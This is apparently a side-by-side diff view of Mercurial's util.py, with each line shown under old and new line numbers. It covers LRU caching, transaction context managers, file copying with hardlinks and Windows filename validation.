1147 >>> c is a
1160 >>> c is a
1148 True
1161 True
1149 >>> a = a.preparewrite()
1162 >>> a = a.preparewrite()
1150 >>> b is a
1163 >>> b is a
1151 False
1164 False
1152 >>> a is a.preparewrite()
1165 >>> a is a.preparewrite()
1153 True
1166 True
1154 >>> c = c.preparewrite()
1167 >>> c = c.preparewrite()
1155 >>> b is c
1168 >>> b is c
1156 False
1169 False
1157 >>> b is b.preparewrite()
1170 >>> b is b.preparewrite()
1158 True
1171 True
1159 """
1172 """
1160
1173
1161 class cowsortdict(cow, sortdict):
1174 class cowsortdict(cow, sortdict):
1162 """copy-on-write sortdict
1175 """copy-on-write sortdict
1163
1176
1164 Be sure to call d = d.preparewrite() before writing to d.
1177 Be sure to call d = d.preparewrite() before writing to d.
1165 """
1178 """
1166
1179
1167 class transactional(object):
1180 class transactional(object):
1168 """Base class for making a transactional type into a context manager."""
1181 """Base class for making a transactional type into a context manager."""
1169 __metaclass__ = abc.ABCMeta
1182 __metaclass__ = abc.ABCMeta
1170
1183
1171 @abc.abstractmethod
1184 @abc.abstractmethod
1172 def close(self):
1185 def close(self):
1173 """Successfully closes the transaction."""
1186 """Successfully closes the transaction."""
1174
1187
1175 @abc.abstractmethod
1188 @abc.abstractmethod
1176 def release(self):
1189 def release(self):
1177 """Marks the end of the transaction.
1190 """Marks the end of the transaction.
1178
1191
1179 If the transaction has not been closed, it will be aborted.
1192 If the transaction has not been closed, it will be aborted.
1180 """
1193 """
1181
1194
1182 def __enter__(self):
1195 def __enter__(self):
1183 return self
1196 return self
1184
1197
1185 def __exit__(self, exc_type, exc_val, exc_tb):
1198 def __exit__(self, exc_type, exc_val, exc_tb):
1186 try:
1199 try:
1187 if exc_type is None:
1200 if exc_type is None:
1188 self.close()
1201 self.close()
1189 finally:
1202 finally:
1190 self.release()
1203 self.release()
1191
1204
1192 @contextlib.contextmanager
1205 @contextlib.contextmanager
1193 def acceptintervention(tr=None):
1206 def acceptintervention(tr=None):
1194 """A context manager that closes the transaction on InterventionRequired
1207 """A context manager that closes the transaction on InterventionRequired
1195
1208
1196 If no transaction was provided, this simply runs the body and returns
1209 If no transaction was provided, this simply runs the body and returns
1197 """
1210 """
1198 if not tr:
1211 if not tr:
1199 yield
1212 yield
1200 return
1213 return
1201 try:
1214 try:
1202 yield
1215 yield
1203 tr.close()
1216 tr.close()
1204 except error.InterventionRequired:
1217 except error.InterventionRequired:
1205 tr.close()
1218 tr.close()
1206 raise
1219 raise
1207 finally:
1220 finally:
1208 tr.release()
1221 tr.release()
1209
1222
1210 @contextlib.contextmanager
1223 @contextlib.contextmanager
1211 def nullcontextmanager():
1224 def nullcontextmanager():
1212 yield
1225 yield
1213
1226
1214 class _lrucachenode(object):
1227 class _lrucachenode(object):
1215 """A node in a doubly linked list.
1228 """A node in a doubly linked list.
1216
1229
1217 Holds a reference to nodes on either side as well as a key-value
1230 Holds a reference to nodes on either side as well as a key-value
1218 pair for the dictionary entry.
1231 pair for the dictionary entry.
1219 """
1232 """
1220 __slots__ = (u'next', u'prev', u'key', u'value')
1233 __slots__ = (u'next', u'prev', u'key', u'value')
1221
1234
1222 def __init__(self):
1235 def __init__(self):
1223 self.next = None
1236 self.next = None
1224 self.prev = None
1237 self.prev = None
1225
1238
1226 self.key = _notset
1239 self.key = _notset
1227 self.value = None
1240 self.value = None
1228
1241
1229 def markempty(self):
1242 def markempty(self):
1230 """Mark the node as emptied."""
1243 """Mark the node as emptied."""
1231 self.key = _notset
1244 self.key = _notset
1232
1245
1233 class lrucachedict(object):
1246 class lrucachedict(object):
1234 """Dict that caches most recent accesses and sets.
1247 """Dict that caches most recent accesses and sets.
1235
1248
1236 The dict consists of an actual backing dict - indexed by original
1249 The dict consists of an actual backing dict - indexed by original
1237 key - and a doubly linked circular list defining the order of entries in
1250 key - and a doubly linked circular list defining the order of entries in
1238 the cache.
1251 the cache.
1239
1252
1240 The head node is the newest entry in the cache. If the cache is full,
1253 The head node is the newest entry in the cache. If the cache is full,
1241 we recycle head.prev and make it the new head. Cache accesses result in
1254 we recycle head.prev and make it the new head. Cache accesses result in
1242 the node being moved to before the existing head and being marked as the
1255 the node being moved to before the existing head and being marked as the
1243 new head node.
1256 new head node.
1244 """
1257 """
1245 def __init__(self, max):
1258 def __init__(self, max):
1246 self._cache = {}
1259 self._cache = {}
1247
1260
1248 self._head = head = _lrucachenode()
1261 self._head = head = _lrucachenode()
1249 head.prev = head
1262 head.prev = head
1250 head.next = head
1263 head.next = head
1251 self._size = 1
1264 self._size = 1
1252 self._capacity = max
1265 self._capacity = max
1253
1266
1254 def __len__(self):
1267 def __len__(self):
1255 return len(self._cache)
1268 return len(self._cache)
1256
1269
1257 def __contains__(self, k):
1270 def __contains__(self, k):
1258 return k in self._cache
1271 return k in self._cache
1259
1272
1260 def __iter__(self):
1273 def __iter__(self):
1261 # We don't have to iterate in cache order, but why not.
1274 # We don't have to iterate in cache order, but why not.
1262 n = self._head
1275 n = self._head
1263 for i in range(len(self._cache)):
1276 for i in range(len(self._cache)):
1264 yield n.key
1277 yield n.key
1265 n = n.next
1278 n = n.next
1266
1279
1267 def __getitem__(self, k):
1280 def __getitem__(self, k):
1268 node = self._cache[k]
1281 node = self._cache[k]
1269 self._movetohead(node)
1282 self._movetohead(node)
1270 return node.value
1283 return node.value
1271
1284
1272 def __setitem__(self, k, v):
1285 def __setitem__(self, k, v):
1273 node = self._cache.get(k)
1286 node = self._cache.get(k)
1274 # Replace existing value and mark as newest.
1287 # Replace existing value and mark as newest.
1275 if node is not None:
1288 if node is not None:
1276 node.value = v
1289 node.value = v
1277 self._movetohead(node)
1290 self._movetohead(node)
1278 return
1291 return
1279
1292
1280 if self._size < self._capacity:
1293 if self._size < self._capacity:
1281 node = self._addcapacity()
1294 node = self._addcapacity()
1282 else:
1295 else:
1283 # Grab the last/oldest item.
1296 # Grab the last/oldest item.
1284 node = self._head.prev
1297 node = self._head.prev
1285
1298
1286 # At capacity. Kill the old entry.
1299 # At capacity. Kill the old entry.
1287 if node.key is not _notset:
1300 if node.key is not _notset:
1288 del self._cache[node.key]
1301 del self._cache[node.key]
1289
1302
1290 node.key = k
1303 node.key = k
1291 node.value = v
1304 node.value = v
1292 self._cache[k] = node
1305 self._cache[k] = node
1293 # And mark it as newest entry. No need to adjust order since it
1306 # And mark it as newest entry. No need to adjust order since it
1294 # is already self._head.prev.
1307 # is already self._head.prev.
1295 self._head = node
1308 self._head = node
1296
1309
1297 def __delitem__(self, k):
1310 def __delitem__(self, k):
1298 node = self._cache.pop(k)
1311 node = self._cache.pop(k)
1299 node.markempty()
1312 node.markempty()
1300
1313
1301 # Temporarily mark as newest item before re-adjusting head to make
1314 # Temporarily mark as newest item before re-adjusting head to make
1302 # this node the oldest item.
1315 # this node the oldest item.
1303 self._movetohead(node)
1316 self._movetohead(node)
1304 self._head = node.next
1317 self._head = node.next
1305
1318
1306 # Additional dict methods.
1319 # Additional dict methods.
1307
1320
1308 def get(self, k, default=None):
1321 def get(self, k, default=None):
1309 try:
1322 try:
1310 return self._cache[k].value
1323 return self._cache[k].value
1311 except KeyError:
1324 except KeyError:
1312 return default
1325 return default
1313
1326
1314 def clear(self):
1327 def clear(self):
1315 n = self._head
1328 n = self._head
1316 while n.key is not _notset:
1329 while n.key is not _notset:
1317 n.markempty()
1330 n.markempty()
1318 n = n.next
1331 n = n.next
1319
1332
1320 self._cache.clear()
1333 self._cache.clear()
1321
1334
1322 def copy(self):
1335 def copy(self):
1323 result = lrucachedict(self._capacity)
1336 result = lrucachedict(self._capacity)
1324 n = self._head.prev
1337 n = self._head.prev
1325 # Iterate in oldest-to-newest order, so the copy has the right ordering
1338 # Iterate in oldest-to-newest order, so the copy has the right ordering
1326 for i in range(len(self._cache)):
1339 for i in range(len(self._cache)):
1327 result[n.key] = n.value
1340 result[n.key] = n.value
1328 n = n.prev
1341 n = n.prev
1329 return result
1342 return result
1330
1343
1331 def _movetohead(self, node):
1344 def _movetohead(self, node):
1332 """Mark a node as the newest, making it the new head.
1345 """Mark a node as the newest, making it the new head.
1333
1346
1334 When a node is accessed, it becomes the freshest entry in the LRU
1347 When a node is accessed, it becomes the freshest entry in the LRU
1335 list, which is denoted by self._head.
1348 list, which is denoted by self._head.
1336
1349
1337 Visually, let's make ``N`` the new head node (* denotes head):
1350 Visually, let's make ``N`` the new head node (* denotes head):
1338
1351
1339 previous/oldest <-> head <-> next/next newest
1352 previous/oldest <-> head <-> next/next newest
1340
1353
1341 ----<->--- A* ---<->-----
1354 ----<->--- A* ---<->-----
1342 | |
1355 | |
1343 E <-> D <-> N <-> C <-> B
1356 E <-> D <-> N <-> C <-> B
1344
1357
1345 To:
1358 To:
1346
1359
1347 ----<->--- N* ---<->-----
1360 ----<->--- N* ---<->-----
1348 | |
1361 | |
1349 E <-> D <-> C <-> B <-> A
1362 E <-> D <-> C <-> B <-> A
1350
1363
1351 This requires the following moves:
1364 This requires the following moves:
1352
1365
1353 C.next = D (node.prev.next = node.next)
1366 C.next = D (node.prev.next = node.next)
1354 D.prev = C (node.next.prev = node.prev)
1367 D.prev = C (node.next.prev = node.prev)
1355 E.next = N (head.prev.next = node)
1368 E.next = N (head.prev.next = node)
1356 N.prev = E (node.prev = head.prev)
1369 N.prev = E (node.prev = head.prev)
1357 N.next = A (node.next = head)
1370 N.next = A (node.next = head)
1358 A.prev = N (head.prev = node)
1371 A.prev = N (head.prev = node)
1359 """
1372 """
1360 head = self._head
1373 head = self._head
1361 # C.next = D
1374 # C.next = D
1362 node.prev.next = node.next
1375 node.prev.next = node.next
1363 # D.prev = C
1376 # D.prev = C
1364 node.next.prev = node.prev
1377 node.next.prev = node.prev
1365 # N.prev = E
1378 # N.prev = E
1366 node.prev = head.prev
1379 node.prev = head.prev
1367 # N.next = A
1380 # N.next = A
1368 # It is tempting to do just "head" here, however if node is
1381 # It is tempting to do just "head" here, however if node is
1369 # adjacent to head, this will do bad things.
1382 # adjacent to head, this will do bad things.
1370 node.next = head.prev.next
1383 node.next = head.prev.next
1371 # E.next = N
1384 # E.next = N
1372 node.next.prev = node
1385 node.next.prev = node
1373 # A.prev = N
1386 # A.prev = N
1374 node.prev.next = node
1387 node.prev.next = node
1375
1388
1376 self._head = node
1389 self._head = node
1377
1390
1378 def _addcapacity(self):
1391 def _addcapacity(self):
1379 """Add a node to the circular linked list.
1392 """Add a node to the circular linked list.
1380
1393
1381 The new node is inserted before the head node.
1394 The new node is inserted before the head node.
1382 """
1395 """
1383 head = self._head
1396 head = self._head
1384 node = _lrucachenode()
1397 node = _lrucachenode()
1385 head.prev.next = node
1398 head.prev.next = node
1386 node.prev = head.prev
1399 node.prev = head.prev
1387 node.next = head
1400 node.next = head
1388 head.prev = node
1401 head.prev = node
1389 self._size += 1
1402 self._size += 1
1390 return node
1403 return node
1391
1404
1392 def lrucachefunc(func):
1405 def lrucachefunc(func):
1393 '''cache most recent results of function calls'''
1406 '''cache most recent results of function calls'''
1394 cache = {}
1407 cache = {}
1395 order = collections.deque()
1408 order = collections.deque()
1396 if func.__code__.co_argcount == 1:
1409 if func.__code__.co_argcount == 1:
1397 def f(arg):
1410 def f(arg):
1398 if arg not in cache:
1411 if arg not in cache:
1399 if len(cache) > 20:
1412 if len(cache) > 20:
1400 del cache[order.popleft()]
1413 del cache[order.popleft()]
1401 cache[arg] = func(arg)
1414 cache[arg] = func(arg)
1402 else:
1415 else:
1403 order.remove(arg)
1416 order.remove(arg)
1404 order.append(arg)
1417 order.append(arg)
1405 return cache[arg]
1418 return cache[arg]
1406 else:
1419 else:
1407 def f(*args):
1420 def f(*args):
1408 if args not in cache:
1421 if args not in cache:
1409 if len(cache) > 20:
1422 if len(cache) > 20:
1410 del cache[order.popleft()]
1423 del cache[order.popleft()]
1411 cache[args] = func(*args)
1424 cache[args] = func(*args)
1412 else:
1425 else:
1413 order.remove(args)
1426 order.remove(args)
1414 order.append(args)
1427 order.append(args)
1415 return cache[args]
1428 return cache[args]
1416
1429
1417 return f
1430 return f
1418
1431
1419 class propertycache(object):
1432 class propertycache(object):
1420 def __init__(self, func):
1433 def __init__(self, func):
1421 self.func = func
1434 self.func = func
1422 self.name = func.__name__
1435 self.name = func.__name__
1423 def __get__(self, obj, type=None):
1436 def __get__(self, obj, type=None):
1424 result = self.func(obj)
1437 result = self.func(obj)
1425 self.cachevalue(obj, result)
1438 self.cachevalue(obj, result)
1426 return result
1439 return result
1427
1440
1428 def cachevalue(self, obj, value):
1441 def cachevalue(self, obj, value):
1429 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1442 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1430 obj.__dict__[self.name] = value
1443 obj.__dict__[self.name] = value
1431
1444
1432 def clearcachedproperty(obj, prop):
1445 def clearcachedproperty(obj, prop):
1433 '''clear a cached property value, if one has been set'''
1446 '''clear a cached property value, if one has been set'''
1434 if prop in obj.__dict__:
1447 if prop in obj.__dict__:
1435 del obj.__dict__[prop]
1448 del obj.__dict__[prop]
1436
1449
1437 def increasingchunks(source, min=1024, max=65536):
1450 def increasingchunks(source, min=1024, max=65536):
1438 '''return no less than min bytes per chunk while data remains,
1451 '''return no less than min bytes per chunk while data remains,
1439 doubling min after each chunk until it reaches max'''
1452 doubling min after each chunk until it reaches max'''
1440 def log2(x):
1453 def log2(x):
1441 if not x:
1454 if not x:
1442 return 0
1455 return 0
1443 i = 0
1456 i = 0
1444 while x:
1457 while x:
1445 x >>= 1
1458 x >>= 1
1446 i += 1
1459 i += 1
1447 return i - 1
1460 return i - 1
1448
1461
1449 buf = []
1462 buf = []
1450 blen = 0
1463 blen = 0
1451 for chunk in source:
1464 for chunk in source:
1452 buf.append(chunk)
1465 buf.append(chunk)
1453 blen += len(chunk)
1466 blen += len(chunk)
1454 if blen >= min:
1467 if blen >= min:
1455 if min < max:
1468 if min < max:
1456 min = min << 1
1469 min = min << 1
1457 nmin = 1 << log2(blen)
1470 nmin = 1 << log2(blen)
1458 if nmin > min:
1471 if nmin > min:
1459 min = nmin
1472 min = nmin
1460 if min > max:
1473 if min > max:
1461 min = max
1474 min = max
1462 yield ''.join(buf)
1475 yield ''.join(buf)
1463 blen = 0
1476 blen = 0
1464 buf = []
1477 buf = []
1465 if buf:
1478 if buf:
1466 yield ''.join(buf)
1479 yield ''.join(buf)
1467
1480
1468 def always(fn):
1481 def always(fn):
1469 return True
1482 return True
1470
1483
1471 def never(fn):
1484 def never(fn):
1472 return False
1485 return False
1473
1486
1474 def nogc(func):
1487 def nogc(func):
1475 """disable garbage collector
1488 """disable garbage collector
1476
1489
1477 Python's garbage collector triggers a GC each time a certain number of
1490 Python's garbage collector triggers a GC each time a certain number of
1478 container objects (the number being defined by gc.get_threshold()) are
1491 container objects (the number being defined by gc.get_threshold()) are
1479 allocated even when marked not to be tracked by the collector. Tracking has
1492 allocated even when marked not to be tracked by the collector. Tracking has
1480 no effect on when GCs are triggered, only on what objects the GC looks
1493 no effect on when GCs are triggered, only on what objects the GC looks
1481 into. As a workaround, disable GC while building complex (huge)
1494 into. As a workaround, disable GC while building complex (huge)
1482 containers.
1495 containers.
1483
1496
1484 This garbage collector issue have been fixed in 2.7. But it still affect
1497 This garbage collector issue have been fixed in 2.7. But it still affect
1485 CPython's performance.
1498 CPython's performance.
1486 """
1499 """
1487 def wrapper(*args, **kwargs):
1500 def wrapper(*args, **kwargs):
1488 gcenabled = gc.isenabled()
1501 gcenabled = gc.isenabled()
1489 gc.disable()
1502 gc.disable()
1490 try:
1503 try:
1491 return func(*args, **kwargs)
1504 return func(*args, **kwargs)
1492 finally:
1505 finally:
1493 if gcenabled:
1506 if gcenabled:
1494 gc.enable()
1507 gc.enable()
1495 return wrapper
1508 return wrapper
1496
1509
1497 if pycompat.ispypy:
1510 if pycompat.ispypy:
1498 # PyPy runs slower with gc disabled
1511 # PyPy runs slower with gc disabled
1499 nogc = lambda x: x
1512 nogc = lambda x: x
1500
1513
1501 def pathto(root, n1, n2):
1514 def pathto(root, n1, n2):
1502 '''return the relative path from one place to another.
1515 '''return the relative path from one place to another.
1503 root should use os.sep to separate directories
1516 root should use os.sep to separate directories
1504 n1 should use os.sep to separate directories
1517 n1 should use os.sep to separate directories
1505 n2 should use "/" to separate directories
1518 n2 should use "/" to separate directories
1506 returns an os.sep-separated path.
1519 returns an os.sep-separated path.
1507
1520
1508 If n1 is a relative path, it's assumed it's
1521 If n1 is a relative path, it's assumed it's
1509 relative to root.
1522 relative to root.
1510 n2 should always be relative to root.
1523 n2 should always be relative to root.
1511 '''
1524 '''
1512 if not n1:
1525 if not n1:
1513 return localpath(n2)
1526 return localpath(n2)
1514 if os.path.isabs(n1):
1527 if os.path.isabs(n1):
1515 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1528 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1516 return os.path.join(root, localpath(n2))
1529 return os.path.join(root, localpath(n2))
1517 n2 = '/'.join((pconvert(root), n2))
1530 n2 = '/'.join((pconvert(root), n2))
1518 a, b = splitpath(n1), n2.split('/')
1531 a, b = splitpath(n1), n2.split('/')
1519 a.reverse()
1532 a.reverse()
1520 b.reverse()
1533 b.reverse()
1521 while a and b and a[-1] == b[-1]:
1534 while a and b and a[-1] == b[-1]:
1522 a.pop()
1535 a.pop()
1523 b.pop()
1536 b.pop()
1524 b.reverse()
1537 b.reverse()
1525 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1538 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1526
1539
1527 # the location of data files matching the source code
1540 # the location of data files matching the source code
1528 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1541 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1529 # executable version (py2exe) doesn't support __file__
1542 # executable version (py2exe) doesn't support __file__
1530 datapath = os.path.dirname(pycompat.sysexecutable)
1543 datapath = os.path.dirname(pycompat.sysexecutable)
1531 else:
1544 else:
1532 datapath = os.path.dirname(pycompat.fsencode(__file__))
1545 datapath = os.path.dirname(pycompat.fsencode(__file__))
1533
1546
1534 i18n.setdatapath(datapath)
1547 i18n.setdatapath(datapath)
1535
1548
1536 def checksignature(func):
1549 def checksignature(func):
1537 '''wrap a function with code to check for calling errors'''
1550 '''wrap a function with code to check for calling errors'''
1538 def check(*args, **kwargs):
1551 def check(*args, **kwargs):
1539 try:
1552 try:
1540 return func(*args, **kwargs)
1553 return func(*args, **kwargs)
1541 except TypeError:
1554 except TypeError:
1542 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1555 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1543 raise error.SignatureError
1556 raise error.SignatureError
1544 raise
1557 raise
1545
1558
1546 return check
1559 return check
1547
1560
1548 # a whilelist of known filesystems where hardlink works reliably
1561 # a whilelist of known filesystems where hardlink works reliably
1549 _hardlinkfswhitelist = {
1562 _hardlinkfswhitelist = {
1550 'apfs',
1563 'apfs',
1551 'btrfs',
1564 'btrfs',
1552 'ext2',
1565 'ext2',
1553 'ext3',
1566 'ext3',
1554 'ext4',
1567 'ext4',
1555 'hfs',
1568 'hfs',
1556 'jfs',
1569 'jfs',
1557 'NTFS',
1570 'NTFS',
1558 'reiserfs',
1571 'reiserfs',
1559 'tmpfs',
1572 'tmpfs',
1560 'ufs',
1573 'ufs',
1561 'xfs',
1574 'xfs',
1562 'zfs',
1575 'zfs',
1563 }
1576 }
1564
1577
1565 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1578 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1566 '''copy a file, preserving mode and optionally other stat info like
1579 '''copy a file, preserving mode and optionally other stat info like
1567 atime/mtime
1580 atime/mtime
1568
1581
1569 checkambig argument is used with filestat, and is useful only if
1582 checkambig argument is used with filestat, and is useful only if
1570 destination file is guarded by any lock (e.g. repo.lock or
1583 destination file is guarded by any lock (e.g. repo.lock or
1571 repo.wlock).
1584 repo.wlock).
1572
1585
1573 copystat and checkambig should be exclusive.
1586 copystat and checkambig should be exclusive.
1574 '''
1587 '''
1575 assert not (copystat and checkambig)
1588 assert not (copystat and checkambig)
1576 oldstat = None
1589 oldstat = None
1577 if os.path.lexists(dest):
1590 if os.path.lexists(dest):
1578 if checkambig:
1591 if checkambig:
1579 oldstat = checkambig and filestat.frompath(dest)
1592 oldstat = checkambig and filestat.frompath(dest)
1580 unlink(dest)
1593 unlink(dest)
1581 if hardlink:
1594 if hardlink:
1582 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1595 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1583 # unless we are confident that dest is on a whitelisted filesystem.
1596 # unless we are confident that dest is on a whitelisted filesystem.
1584 try:
1597 try:
1585 fstype = getfstype(os.path.dirname(dest))
1598 fstype = getfstype(os.path.dirname(dest))
1586 except OSError:
1599 except OSError:
1587 fstype = None
1600 fstype = None
1588 if fstype not in _hardlinkfswhitelist:
1601 if fstype not in _hardlinkfswhitelist:
1589 hardlink = False
1602 hardlink = False
1590 if hardlink:
1603 if hardlink:
1591 try:
1604 try:
1592 oslink(src, dest)
1605 oslink(src, dest)
1593 return
1606 return
1594 except (IOError, OSError):
1607 except (IOError, OSError):
1595 pass # fall back to normal copy
1608 pass # fall back to normal copy
1596 if os.path.islink(src):
1609 if os.path.islink(src):
1597 os.symlink(os.readlink(src), dest)
1610 os.symlink(os.readlink(src), dest)
1598 # copytime is ignored for symlinks, but in general copytime isn't needed
1611 # copytime is ignored for symlinks, but in general copytime isn't needed
1599 # for them anyway
1612 # for them anyway
1600 else:
1613 else:
1601 try:
1614 try:
1602 shutil.copyfile(src, dest)
1615 shutil.copyfile(src, dest)
1603 if copystat:
1616 if copystat:
1604 # copystat also copies mode
1617 # copystat also copies mode
1605 shutil.copystat(src, dest)
1618 shutil.copystat(src, dest)
1606 else:
1619 else:
1607 shutil.copymode(src, dest)
1620 shutil.copymode(src, dest)
1608 if oldstat and oldstat.stat:
1621 if oldstat and oldstat.stat:
1609 newstat = filestat.frompath(dest)
1622 newstat = filestat.frompath(dest)
1610 if newstat.isambig(oldstat):
1623 if newstat.isambig(oldstat):
1611 # stat of copied file is ambiguous to original one
1624 # stat of copied file is ambiguous to original one
1612 advanced = (
1625 advanced = (
1613 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1626 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1614 os.utime(dest, (advanced, advanced))
1627 os.utime(dest, (advanced, advanced))
1615 except shutil.Error as inst:
1628 except shutil.Error as inst:
1616 raise error.Abort(str(inst))
1629 raise error.Abort(str(inst))
1617
1630
1618 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1631 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1619 """Copy a directory tree using hardlinks if possible."""
1632 """Copy a directory tree using hardlinks if possible."""
1620 num = 0
1633 num = 0
1621
1634
1622 gettopic = lambda: hardlink and _('linking') or _('copying')
1635 gettopic = lambda: hardlink and _('linking') or _('copying')
1623
1636
1624 if os.path.isdir(src):
1637 if os.path.isdir(src):
1625 if hardlink is None:
1638 if hardlink is None:
1626 hardlink = (os.stat(src).st_dev ==
1639 hardlink = (os.stat(src).st_dev ==
1627 os.stat(os.path.dirname(dst)).st_dev)
1640 os.stat(os.path.dirname(dst)).st_dev)
1628 topic = gettopic()
1641 topic = gettopic()
1629 os.mkdir(dst)
1642 os.mkdir(dst)
1630 for name, kind in listdir(src):
1643 for name, kind in listdir(src):
1631 srcname = os.path.join(src, name)
1644 srcname = os.path.join(src, name)
1632 dstname = os.path.join(dst, name)
1645 dstname = os.path.join(dst, name)
1633 def nprog(t, pos):
1646 def nprog(t, pos):
1634 if pos is not None:
1647 if pos is not None:
1635 return progress(t, pos + num)
1648 return progress(t, pos + num)
1636 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1649 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1637 num += n
1650 num += n
1638 else:
1651 else:
1639 if hardlink is None:
1652 if hardlink is None:
1640 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1653 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1641 os.stat(os.path.dirname(dst)).st_dev)
1654 os.stat(os.path.dirname(dst)).st_dev)
1642 topic = gettopic()
1655 topic = gettopic()
1643
1656
1644 if hardlink:
1657 if hardlink:
1645 try:
1658 try:
1646 oslink(src, dst)
1659 oslink(src, dst)
1647 except (IOError, OSError):
1660 except (IOError, OSError):
1648 hardlink = False
1661 hardlink = False
1649 shutil.copy(src, dst)
1662 shutil.copy(src, dst)
1650 else:
1663 else:
1651 shutil.copy(src, dst)
1664 shutil.copy(src, dst)
1652 num += 1
1665 num += 1
1653 progress(topic, num)
1666 progress(topic, num)
1654 progress(topic, None)
1667 progress(topic, None)
1655
1668
1656 return hardlink, num
1669 return hardlink, num
1657
1670
1658 _winreservednames = {
1671 _winreservednames = {
1659 'con', 'prn', 'aux', 'nul',
1672 'con', 'prn', 'aux', 'nul',
1660 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1673 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1661 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1674 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1662 }
1675 }
1663 _winreservedchars = ':*?"<>|'
1676 _winreservedchars = ':*?"<>|'
1664 def checkwinfilename(path):
1677 def checkwinfilename(path):
1665 r'''Check that the base-relative path is a valid filename on Windows.
1678 r'''Check that the base-relative path is a valid filename on Windows.
1666 Returns None if the path is ok, or a UI string describing the problem.
1679 Returns None if the path is ok, or a UI string describing the problem.
1667
1680
1668 >>> checkwinfilename(b"just/a/normal/path")
1681 >>> checkwinfilename(b"just/a/normal/path")
1669 >>> checkwinfilename(b"foo/bar/con.xml")
1682 >>> checkwinfilename(b"foo/bar/con.xml")
1670 "filename contains 'con', which is reserved on Windows"
1683 "filename contains 'con', which is reserved on Windows"
1671 >>> checkwinfilename(b"foo/con.xml/bar")
1684 >>> checkwinfilename(b"foo/con.xml/bar")
1672 "filename contains 'con', which is reserved on Windows"
1685 "filename contains 'con', which is reserved on Windows"
1673 >>> checkwinfilename(b"foo/bar/xml.con")
1686 >>> checkwinfilename(b"foo/bar/xml.con")
1674 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1687 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1675 "filename contains 'AUX', which is reserved on Windows"
1688 "filename contains 'AUX', which is reserved on Windows"
1676 >>> checkwinfilename(b"foo/bar/bla:.txt")
1689 >>> checkwinfilename(b"foo/bar/bla:.txt")
1677 "filename contains ':', which is reserved on Windows"
1690 "filename contains ':', which is reserved on Windows"
1678 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1691 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1679 "filename contains '\\x07', which is invalid on Windows"
1692 "filename contains '\\x07', which is invalid on Windows"
1680 >>> checkwinfilename(b"foo/bar/bla ")
1693 >>> checkwinfilename(b"foo/bar/bla ")
1681 "filename ends with ' ', which is not allowed on Windows"
1694 "filename ends with ' ', which is not allowed on Windows"
1682 >>> checkwinfilename(b"../bar")
1695 >>> checkwinfilename(b"../bar")
1683 >>> checkwinfilename(b"foo\\")
1696 >>> checkwinfilename(b"foo\\")
1684 "filename ends with '\\', which is invalid on Windows"
1697 "filename ends with '\\', which is invalid on Windows"
1685 >>> checkwinfilename(b"foo\\/bar")
1698 >>> checkwinfilename(b"foo\\/bar")
1686 "directory name ends with '\\', which is invalid on Windows"
1699 "directory name ends with '\\', which is invalid on Windows"
1687 '''
1700 '''
1688 if path.endswith('\\'):
1701 if path.endswith('\\'):
1689 return _("filename ends with '\\', which is invalid on Windows")
1702 return _("filename ends with '\\', which is invalid on Windows")
1690 if '\\/' in path:
1703 if '\\/' in path:
1691 return _("directory name ends with '\\', which is invalid on Windows")
1704 return _("directory name ends with '\\', which is invalid on Windows")
1692 for n in path.replace('\\', '/').split('/'):
1705 for n in path.replace('\\', '/').split('/'):
1693 if not n:
1706 if not n:
1694 continue
1707 continue
1695 for c in _filenamebytestr(n):
1708 for c in _filenamebytestr(n):
1696 if c in _winreservedchars:
1709 if c in _winreservedchars:
1697 return _("filename contains '%s', which is reserved "
1710 return _("filename contains '%s', which is reserved "
1698 "on Windows") % c
1711 "on Windows") % c
1699 if ord(c) <= 31:
1712 if ord(c) <= 31:
1700 return _("filename contains '%s', which is invalid "
1713 return _("filename contains '%s', which is invalid "
1701 "on Windows") % stringutil.escapestr(c)
1714 "on Windows") % stringutil.escapestr(c)
1702 base = n.split('.')[0]
1715 base = n.split('.')[0]
1703 if base and base.lower() in _winreservednames:
1716 if base and base.lower() in _winreservednames:
1704 return _("filename contains '%s', which is reserved "
1717 return _("filename contains '%s', which is reserved "
1705 "on Windows") % base
1718 "on Windows") % base
1706 t = n[-1:]
1719 t = n[-1:]
1707 if t in '. ' and n not in '..':
1720 if t in '. ' and n not in '..':
1708 return _("filename ends with '%s', which is not allowed "
1721 return _("filename ends with '%s', which is not allowed "
1709 "on Windows") % t
1722 "on Windows") % t
1710
1723
1711 if pycompat.iswindows:
1724 if pycompat.iswindows:
1712 checkosfilename = checkwinfilename
1725 checkosfilename = checkwinfilename
1713 timer = time.clock
1726 timer = time.clock
1714 else:
1727 else:
1715 checkosfilename = platform.checkosfilename
1728 checkosfilename = platform.checkosfilename
1716 timer = time.time
1729 timer = time.time
1717
1730
